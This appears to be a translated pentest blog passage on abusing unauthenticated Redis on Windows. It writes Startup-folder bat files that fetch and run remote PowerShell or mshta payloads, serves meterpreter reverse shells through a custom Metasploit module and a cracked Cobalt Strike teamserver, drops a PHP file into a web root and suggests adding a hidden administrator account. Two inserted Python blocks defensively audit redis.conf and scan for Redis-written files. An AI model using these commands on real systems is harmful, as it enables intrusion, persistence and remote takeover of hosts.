```
192.168.230.134:6379> config set dir "C:/Users/Administrator/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/startup/"
OK
192.168.230.134:6379> config set dbfilename shell.bat
OK
192.168.230.134:6379> set x "\r\n\r\npowershell -windowstyle hidden -exec bypass -c \"IEX (New-Object Net.WebClient).DownloadString('http://192.168.230.133/shell.ps1');xx.ps1\"\r\n\r\n"
OK
192.168.230.134:6379> save
OK
```
```ruby
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'Microsoft Office Payload Delivery',
      'Description' => %q{
        This module generates a command to place within a Word document that,
        when executed, will retrieve an HTA payload via HTTP from a web server.
        Currently have not figured out how to generate a doc.
      },
      'License'       => MSF_LICENSE,
      'Arch'          => ARCH_X86,
      'Platform'      => 'win',
      'Targets'       => [
        ['Automatic', {}],
      ],
      'DefaultTarget' => 0,
    ))
  end

  # Serve the HTA (PowerShell stager) to whatever requests the URI
  def on_request_uri(cli, _request)
    print_status("Delivering payload")
    p = regenerate_payload(cli)
    data = Msf::Util::EXE.to_executable_fmt(
      framework, ARCH_X86, 'win', p.encoded, 'hta-psh',
      { :arch => ARCH_X86, :platform => 'win' }
    )
    send_response(cli, data, 'Content-Type' => 'application/hta')
  end

  # Print the command that has to be placed in the document
  def primer
    url = get_uri
    print_status("Place the following DDE in an MS document:")
    print_line("mshta.exe \"#{url}\"")
  end
end
```
Then reload all modules in msf with reload_all; once the module shows up, it can be used.
```
msf5 exploit(windows/msh_shell) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(windows/msh_shell) > set lhost 192.168.230.133
lhost => 192.168.230.133
msf5 exploit(windows/msh_shell) > set uripath shell
uripath => shell
msf5 exploit(windows/msh_shell) > exploit
zlib(finalizer): the stream was freed prematurely.
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 192.168.230.133:4444
[*] Using URL: http://0.0.0.0:8080/shell
[*] Local IP: http://192.168.230.133:8080/shell
[*] Server started.
[*] Place the following DDE in an MS document:
mshta.exe "http://192.168.230.133:8080/shell"
```
Then use Redis to write the bat file into the startup folder.
```
[root@localhost src]# ./redis-cli -h 192.168.230.134
192.168.230.134:6379> config set dir "C:/Users/Administrator/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/startup/"
OK
192.168.230.134:6379> config set dbfilename shell.bat
OK
192.168.230.134:6379> set x "\r\n\r\nmshta http://192.168.230.133:8080/shell\r\n\r\n"
OK
192.168.230.134:6379> save
OK
```
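Every redis-cli session on this page starts the same way: a connection with no password, followed by CONFIG SET dir and CONFIG SET dbfilename. That is the part a defender can act on. The following is an added example, not code from the original post: a small Python audit of a redis.conf text that flags the settings which make this write possible (bind, protected-mode, requirepass, rename-command CONFIG, and on Redis 7+ the enable-protected-configs switch). The two sample configs inside it are constructed, and the 16-character password threshold is this example's own choice.

```python
"""Audit a redis.conf for the settings that make the write-to-disk trick on this
page work: an instance reachable over the network, no password, and CONFIG SET
still usable to change dir and dbfilename.
"""
import re
from typing import Dict, List


def parse_conf(text: str) -> Dict[str, List[str]]:
    """Map each directive (lowercased) to its argument strings, in file order.
    Directives that may repeat (rename-command) keep every occurrence."""
    conf: Dict[str, List[str]] = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 1)
        conf.setdefault(parts[0].lower(), []).append(parts[1] if len(parts) > 1 else "")
    return conf


def audit(text: str) -> List[str]:
    """Return findings; an empty list means every checked setting is hardened."""
    conf = parse_conf(text)
    findings: List[str] = []

    binds = conf.get("bind", [])
    if not binds or any("0.0.0.0" in b or "*" in b for b in binds):
        findings.append("bind: listens on all interfaces (missing, 0.0.0.0 or *)")

    # Absent is treated as the Redis >= 3.2 default "yes"; older builds have
    # no protected mode at all and depend entirely on bind/requirepass.
    if conf.get("protected-mode", ["yes"])[-1].lower() == "no":
        findings.append("protected-mode no: remote clients need no authentication")

    password = conf.get("requirepass", [""])[-1].strip().strip('"')
    if not password:
        findings.append("requirepass: unset, anyone who can connect can run commands")
    elif len(password) < 16:  # threshold chosen for this example
        findings.append("requirepass: short, and Redis does not rate-limit AUTH")

    renamed = {a.split()[0].upper() for a in conf.get("rename-command", []) if a.split()}
    if "CONFIG" not in renamed:
        findings.append("rename-command CONFIG: not renamed or disabled, clients can set dir/dbfilename")

    # Redis 7+ only: CONFIG SET on dir/dbfilename is refused unless this is "yes".
    if conf.get("enable-protected-configs", ["no"])[-1].lower() == "yes":
        findings.append("enable-protected-configs yes: dir/dbfilename changeable at runtime")

    return findings


# Constructed sample configs, not taken from the page.
WEAK_CONF = """
bind 0.0.0.0
protected-mode no
port 6379
dir ./
dbfilename dump.rdb
"""

HARDENED_CONF = """
bind 127.0.0.1
protected-mode yes
port 6379
requirepass "constructed-long-passphrase-0123"
rename-command CONFIG ""
enable-protected-configs no
dir ./
dbfilename dump.rdb
"""

if __name__ == "__main__":
    for label, text in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(f"== {label} ==")
        for finding in audit(text) or ["no findings"]:
            print("  -", finding)
```

Run it against the real file with `audit(open("redis.conf").read())`; on the Windows port the file is usually named redis.windows.conf but uses the same directives. Renaming CONFIG removes the `config set dir` step that every session above relies on, and a bind to loopback means redis-cli from another host never gets a prompt at all.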
```
root@kali:/tools/cobaltctrike3.13-cracked# ./teamserver 192.168.230.133 233
[*] Generating X509 certificate and keystore (for SSL)
[+] Team server is up on 50050
[*] SHA256 hash of SSL cert is: 56b1896ec2bc1dfaab7445e7b9e63f30ab640e5a6180c2ac41de3d936da6c13b
```
Then connect with the client: the username is msf, the password is 233, and the port is whatever the server side reports.
Create a listener, leave the payload at its default, and set the port yourself.
Generate the attack script, taking care that the ports do not conflict.
Finally, a payload string is produced; use Redis to write a bat script into the startup folder, then wait for the target to reboot.
```
[root@localhost src]# ./redis-cli -h 192.168.230.134
192.168.230.134:6379> config set dir "C:/Users/Administrator/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/startup/"
OK
192.168.230.134:6379> config set dbfilename shell.bat
OK
192.168.230.134:6379> set x "\r\n\r\npowershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://192.168.230.133:80/a'))\"\r\n\r\n"
OK
192.168.230.134:6379> save
OK
```
```
[root@localhost src]# ./redis-cli -h 192.168.230.134
192.168.230.134:6379> config set dir "C:/phpstudy/WWW"
OK
192.168.230.134:6379> config set dbfilename phpinfo.php
OK
192.168.230.134:6379> set x "\r\n\r\n<?php phpinfo();?>\r\n\r\n"
OK
192.168.230.134:6379> save
OK
```
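Whatever filename CONFIG SET dbfilename picks, SAVE writes a complete RDB file, so the shell.bat and phpinfo.php produced in the sessions above start with the RDB magic "REDIS" plus a four-digit version and carry the planted string between binary framing. That is a reliable artifact to hunt for. The following is an added example, not code from the original post: a Python scanner that flags files in autorun locations and web roots which carry the RDB magic without the .rdb extension, and pulls the readable lines out of them so the planted command is visible. The location list and the synthetic dump in build_sample_dir are constructed; the framing there only approximates a real RDB file.

```python
"""Look for files in autorun and web-root locations that Redis wrote.

Redis SAVE always starts its output with the RDB magic "REDIS" followed by a
four-digit version, whatever name CONFIG SET dbfilename assigned. A .bat in a
Startup folder, or a .php in a web root, that starts with that magic was
written by Redis rather than by a user or an installer, which is exactly the
artifact the redis-cli sessions on this page leave behind.
"""
import os
import re
import tempfile
from typing import Iterator, List, Tuple

RDB_MAGIC = re.compile(rb"^REDIS\d{4}")

# Places worth checking, taken from the paths used on this page; adjust per host.
DEFAULT_LOCATIONS = [
    r"C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup",
    r"C:\phpstudy\WWW",
]


def is_rdb_dump(path: str) -> bool:
    """True if the file begins with the Redis RDB magic."""
    try:
        with open(path, "rb") as fh:
            return RDB_MAGIC.match(fh.read(9)) is not None
    except OSError:
        return False


def embedded_text_lines(path: str, min_len: int = 8) -> List[str]:
    """Extract the readable lines from a dump. The binary RDB framing around a
    planted value contains control bytes and drops out; the planted command
    survives as a clean printable line, which is what an analyst wants to see."""
    with open(path, "rb") as fh:
        data = fh.read()
    lines = []
    for raw in data.split(b"\n"):
        text = raw.strip(b"\r").decode("ascii", errors="ignore")
        if len(text) >= min_len and text.isprintable():
            lines.append(text)
    return lines


def scan(locations) -> Iterator[Tuple[str, List[str]]]:
    """Yield (path, readable lines) for each file that is an RDB dump but
    does not carry the .rdb extension."""
    for loc in locations:
        if not os.path.isdir(loc):
            continue
        for name in sorted(os.listdir(loc)):
            path = os.path.join(loc, name)
            if (os.path.isfile(path) and not name.lower().endswith(".rdb")
                    and is_rdb_dump(path)):
                yield path, embedded_text_lines(path)


def build_sample_dir() -> str:
    """Constructed test data: a temp directory holding a shell.bat shaped like
    the file a CONFIG SET dir/dbfilename + SAVE sequence leaves behind, beside
    a benign batch file. The RDB framing is an approximation, not a real dump."""
    d = tempfile.mkdtemp(prefix="startup-")
    payload = b"\r\n\r\nmshta http://192.168.230.133:8080/shell\r\n\r\n"
    dump = (
        b"REDIS0009"                                        # magic + version
        + b"\xfa\tredis-ver\x055.0.3"                       # one aux field
        + b"\xfe\x00\xfb\x01\x00"                           # select db 0, size hints
        + b"\x00\x01x" + bytes([len(payload)]) + payload    # key "x" -> planted value
        + b"\xff" + b"\x00" * 8                             # EOF marker + fake checksum
    )
    with open(os.path.join(d, "shell.bat"), "wb") as fh:
        fh.write(dump)
    with open(os.path.join(d, "backup.bat"), "wb") as fh:
        fh.write(b"@echo off\r\nxcopy C:\\data D:\\backup /E /Y\r\n")
    return d


if __name__ == "__main__":
    for found, lines in scan(DEFAULT_LOCATIONS + [build_sample_dir()]):
        print(f"[!] Redis-written file: {found}")
        for line in lines:
            print(f"    {line}")
```

The check is cheap enough to run from a scheduled task over every Startup folder, the all-users Startup folder and each web root, and the same magic test applies to anything else a dump can be aimed at, such as a cron directory or an authorized_keys file on Linux hosts.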
0x05 Some thoughts
In real environments I did run into several systems where the startup directory was accessible, and during testing a shell could still be obtained even when security software was installed. Another thing I do not know is what happens, with port 3389 open, if a command like net user test$ xxxxxx /add & net localgroup administrators test$ /add is executed directly; on a local test box it works. On a Server 2003 system, a shell can be obtained by writing a MOF file. Real production environments are still very complex, but there are always more methods than difficulties. This summary is not very comprehensive; anyone with better ideas is welcome to discuss.